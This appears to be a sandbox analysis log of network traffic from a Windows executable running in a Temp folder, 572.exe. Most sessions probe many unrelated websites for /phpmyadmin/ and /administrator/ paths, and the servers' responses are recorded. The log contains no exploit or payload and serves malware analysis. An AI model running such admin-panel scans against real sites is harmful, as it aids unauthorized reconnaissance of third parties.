Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.6 | 55183 | 142.250.105.84 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:14:53 UTC | 1252 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eFqbeSWKLZhDPmXcCx4TwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
77          192.168.2.6  55176        172.67.184.59   443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:52 UTC  172  OUT  GET /phpmyadmin/ HTTP/1.1
Host: hartico.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC  638  IN  HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:52 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:52 GMT
Location: https://hartico.tv/phpmyadmin/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FQSUnENUq0LwXe%2B2vEmFOztypN%2BplkC%2BxYtTzGE27hQX2Uk9EkkjZSfL5Ex79O0G%2BN7e4iGtvwrLABl%2BVM2lpB3nycF3prt1e5fBKxsD2W6NujcSnSJl1Jn6iBpImQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 850abb77bbd1678d-ATL
alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:53 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
78          192.168.2.6  56007        184.25.164.103  443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:52 UTC  186  OUT  GET /administrator/ HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  233  IN  HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://store.steampowered.com/
Strict-Transport-Security: max-age=10368000
Date: Mon, 05 Feb 2024 11:14:52 GMT
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
79          192.168.2.6  55303        47.251.24.188   443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:52 UTC  179  OUT  GET /phpmyadmin/ HTTP/1.1
Host: cjdropshipping.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC  728  IN  HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 39
Connection: close
Set-Cookie: INGRESSCOOKIE=1707131693.904.98.256658|f85a63221c8fd9b049d9a82e34821ae3; Path=/; Secure; HttpOnly
Vary: Origin
set-cookie: csrfToken=jsNB62ashjmVJxyLb82eeJUD; path=/
set-cookie: lng=en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
set-cookie: language=en|en; path=/; expires=Fri, 01 Jan 3030 00:00:00 GMT; domain=.cjdropshipping.com
Location: /404
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-download-options: noopen
x-readtime: 11
Cache-Control: no-cache
Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-02-05 11:14:53 UTC  39  IN  Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 34 30 34 22 3e 2f 34 30 34 3c 2f 61 3e 2e
Data Ascii: Redirecting to <a href="/404">/404</a>.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
80          192.168.2.6  55148        36.255.71.45    443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:14:52 UTC  176  OUT  GET /phpmyadmin/ HTTP/1.1
Host: instructory.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC  325  IN  HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Mon, 05 Feb 2024 11:14:53 GMT
content-type: text/html; charset=utf-8
content-length: 66424
vary: Accept-Encoding
x-powered-by: Express
                                                                                                                                                                                                                                                                                                                                                                etag: W/"10378-RHQJPMOxcO0kg0io8UC7Sw6sNcA"
                                                                                                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                cache-control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.6 | 56012 | 138.197.59.199 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 187 | OUT | GET /administrator/ HTTP/1.1
Host: api.cmrsanmartin.ziz.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 585 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Powered-By: JSP/2.2
Set-Cookie: JSESSIONID=fAVl_OzmAbKHuY8hGNs8itqM.cmrsanmartin; path=/
X-XSS-Protection: 1; mode=block
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Robots-Tag: noindex,noarchive
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
Content-Type: text/html;charset=UTF-8
Content-Language: es-CL
Connection: close
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.6 | 54708 | 104.22.74.220 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 174 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: mojadovera.sk
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 1186 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 850abb794fa11395-ATL
alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                83192.168.2.65601134.149.46.130443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 5706 | IN | HTTP/1.1 404 Not Found
content-type: text/html;charset=utf-8
vary: Accept-Encoding
set-cookie: sc-wcid=be8e7c19-3bb8-4c8a-aaf1-075b8b3f9a02; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:14:53 GMT; Max-Age=86400; Secure
expires: Thu, 01 Jan 1970 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubdomains
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-frame-options: allow-from https://iframe.arkoselabs.com
cache-control: no-cache, no-store, max-age=0
content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
x-cloud-trace-context: 8f3ded58776f87a4179fa6d2f1064780
date: Mon, 05 Feb 2024 11:14:53 GMT
server: API Gateway
Content-Length: 664
via: 1.1 google, 1.1 google
alt-svc: clear
strict-transport-security: max-age=31536000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:14:53 UTC | 664 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.6 | 55530 | 163.247.44.239 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:52 UTC | 186 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: mitextoescolar.mineduc.cl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 240 | IN | HTTP/1.1 301 Moved Permanently
date: Mon, 05 Feb 2024 11:14:53 GMT
location: http://mitextoescolar.mineduc.cl/phpmyadmin
content-length: 251
content-type: text/html; charset=iso-8859-1
x-frame-options: SAMEORIGIN
connection: close
2024-02-05 11:14:53 UTC | 251 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://mitextoescolar.mineduc.cl/phpmyadmin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.6 | 55186 | 31.216.144.5 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 168 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 887 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Length: 2709
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
X-Frame-Options: DENY
Set-Cookie: geoip=RO
Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
Connection: Close
2024-02-05 11:14:53 UTC | 2709 | IN | Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.6 | 54855 | 104.26.14.180 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 186 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: aeaaamorim.inovarmais.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 546 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:53 GMT
Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j1NQmeDGwT4WqqDTUDXGAhu0PP9D2Tbo1BhthUi5TUJJtjCmuK3djBde99Qv3hTQe7eR3W0ruJQa47TqPxHETmSKhhpYhRq%2Fa7WKjrk5sZQzg%2Bo5DQ4lsSVH9R4K4TNQOGcd05L9dzeU54s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb7a6d1d672f-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC823INData Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC429INData Raw: 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ound:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.6 | 55259 | 186.113.7.204 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 188 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: oferta.senasofiaplus.edu.co
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 910 | IN | HTTP/1.1 404 No Encontrado
Content-Type: text/html;charset=utf-8
Content-Length: 1002
Date: Mon, 05 Feb 2024 11:14:53 GMT
Connection: close
Set-Cookie: BIGipServerPOOL_SOFIA_OFERTA_PDN_8680=3809615276.59425.0000; path=/; Httponly; Secure
Set-Cookie: dcid=1707131693229-35664204; Expires=Sun, 05-May-2024 11:14:53 GMT
Set-Cookie: pvid=1707131693229-8280750; Expires=Mon, 05-Feb-2024 11:19:53 GMT
Set-Cookie: f5avraaaaaaaaaaaaaaaa_session_=OJDACIMGHJANEMICHILKMLOJHDABJCLAEKBPOKBGNBJKPHFHNHPGAHIMLGNAKOMJCAIDINOPCCMPDBMLGGFAAKEHOMFBCJLCPNNNIODFANAPEFLDMGLNODKKKHLEGHGH; HttpOnly; secure
Set-Cookie: TS0130ba83=01fd6418eb37e70eabaa48eafcbbb0dcaf0d1abf2b607d121b459cdbd79986f75f9a348d31af9d05f863064728c61f1cff7017447ae39131cf689c17efee63f12f5b4bcf4d83fac84514dbd83d4fe1eafc53a6a52744fc0c4bc0f24f6b1ae5fa6444490a0105b51d2e22d2bc66c0797e15ea72f5e9; Path=/; Domain=.oferta.senasofiaplus.edu.co; HTTPOnly
2024-02-05 11:14:53 UTC | 1002 | IN | Data Ascii: <html><head><title>JBoss Web/7.0.10.Final - Informe de Error</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.6 | 55189 | 184.25.164.103 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 183 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 233 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://store.steampowered.com/
Strict-Transport-Security: max-age=10368000
Date: Mon, 05 Feb 2024 11:14:53 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.6 | 55001 | 104.21.34.34 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:53 UTC | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: virtuadopt.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
